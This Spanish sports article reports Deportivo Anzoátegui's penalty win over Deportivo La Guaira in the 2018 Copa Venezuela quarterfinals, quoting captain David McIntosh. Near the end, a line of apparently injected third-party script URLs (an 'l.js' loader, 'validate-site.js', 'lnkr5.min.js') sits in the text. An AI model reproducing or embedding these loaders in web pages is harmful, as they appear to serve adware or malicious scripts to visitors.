¡LOS NUESTROS PRIMERO!

David Mcintosh: Si íbamos a penales ganábamos nosotros

Mcintosh041018

Contra todo pronóstico el Deportivo Anzoátegui inscribió su nombre en las semifinales de la Copa Venezuela, tras batir este miércoles en una serie ante el Deportivo La Guaira que se prolongó hasta la tanda de penales, luego de la paridad a lo largo de los 180 minutos (2-2 en el global). Ya desde los 11 metros, el cuadro oriental se impuso 4-2 en el estadio Olímpico de la UCV.

El club, que ha atravesado una campaña 2018 de muchas dificultades debido a problemas institucionales que incluso pusieron en duda su participación, está rematando en los últimos meses con resonantes triunfos en el Torneo Clausura, a los que se añade este avance en el frente de Copa.

La unión en el grupo fue clave para el pase hasta la penúltima instancia del certamen del equipo dirigido por Jobanny Rivero, o así lo destacó el capitán David McintoshSports Venezuela.

“Creímos en un orden que nos implantó ‘el profe’, vinimos a tratar de plasmarnos, sabíamos que era difícil porque La Guaira tenía individualidades determinantes, sin embargo siempre estuvimos juntos, ayudándonos y por eso se nos dio el resultado”, apuntó el veterano defensor.

La atmósfera del duelo no parecían llamar al optimismo en el cuadro portocruzano, pues arrastraban una dura caída el pasado fin de semana a manos de Estudiantes de Caracas (3-2), uno de sus rivales más directos en la lucha por mantenerse en Primera División. Además, ese duelo se extendió por espacio de dos días debido a las condiciones climáticas en la capital y la iluminación del Cocodrilos Sports Park, recinto de ese choque.

Tras ello, regresaron a casa y dos días después tenían que volver a decir presente en Caracas, para enfrentar a un embalado elenco litoralense, que no perdió en septiembre y solo cedió dos empates, uno de ellos justamente ante el DANZ por la ida de estos cuartos de final.

“Sabemos que tenemos un equipo corto, somos pocos jugadores, hemos perdido partidos porque acusamos el cansancio en esos encuentros, los traslados que son terroríficos hoy en día en Venezuela. Esta vez, descansamos un poquito más, el equipo trabajo más, hubo caras nuevas que no estuvieron en partidos pasados y cumplimos”, aseguró quien disputó los 90 minutos como marcador de punta por derecha.

Confiados en los penales

A medida que pasaban los minutos, se hacía más evidente que tanto La Guaira como Anzoátegui llegarían hasta los penales. Aunque los varguenses tuvieron en sus manos adjudicarse la serie, no pudieron inclinar la balanza a su favor y todo quedó en el último criterio para desempatar una serie.

“Nosotros partimos de un orden y de salir de aquí con la cara en alto, sabíamos que en cualquier momento podíamos golpear, arrancamos ganando y lamentablemente nos empatan el partido, pero nunca nos desarmamos y obtuvimos el resultado”, indicó el futbolista de 45 años de edad sobre como transcurrió el compromiso para llegar hasta allí.

Ya en la definición, siempre se mostró confiado en que podrían alzar los brazos y celebrar el boleto a semifinales. “Yo decía que si íbamos a los penales ganábamos nosotros, porque sé el arquero que tenemos, tapa muchos penales y no es la primera vez que lo hace. Les dije a los muchachos ‘tranquilos que con este la ganamos, así solo metamos una sola’ y así fue”.

“Queremos seguir en primera”

Sin embargo, el equipo no se desvía y saben que tienen una intensa batalla hasta el final de la ronda regular del Clausura con Metropolitanos y el ‘académico de la Capital’ para quedarse en la máxima categoría del balompié nacional.

“De momento queremos seguir luchando por el primer objetivo que no es descender y después enfocarnos en el campeonato -de Copa-. Queremos estar en Primera División para trabajar mejor en una temporada siguiente”, se sinceró Mcintosh.

Ya conoce que su rival será Aragua, una institución con la que celebró la Copa Venezuela en 2008 y la cual suele imponer resistencia a los ‘aurirrrojos’ en este tipo de certámenes -los eliminó en la citada edición y en cuartos de final de 2013-, pero esto no amilanó al experimentado jugador.”Si llegamos hasta aquí sabemos que nos vamos a meter en la final, vamos a superar la siguiente llave”.

Anzoátegui disputará su tercera semifinal el frente copero -primera en seis años-. Ya logró acceder a la última instancia en dos oportunidades y en ambas alzó el trofeo de campeón.

Escrito por: Pablo A. Rondón M. / @PablinhooAlee

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538666391151http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara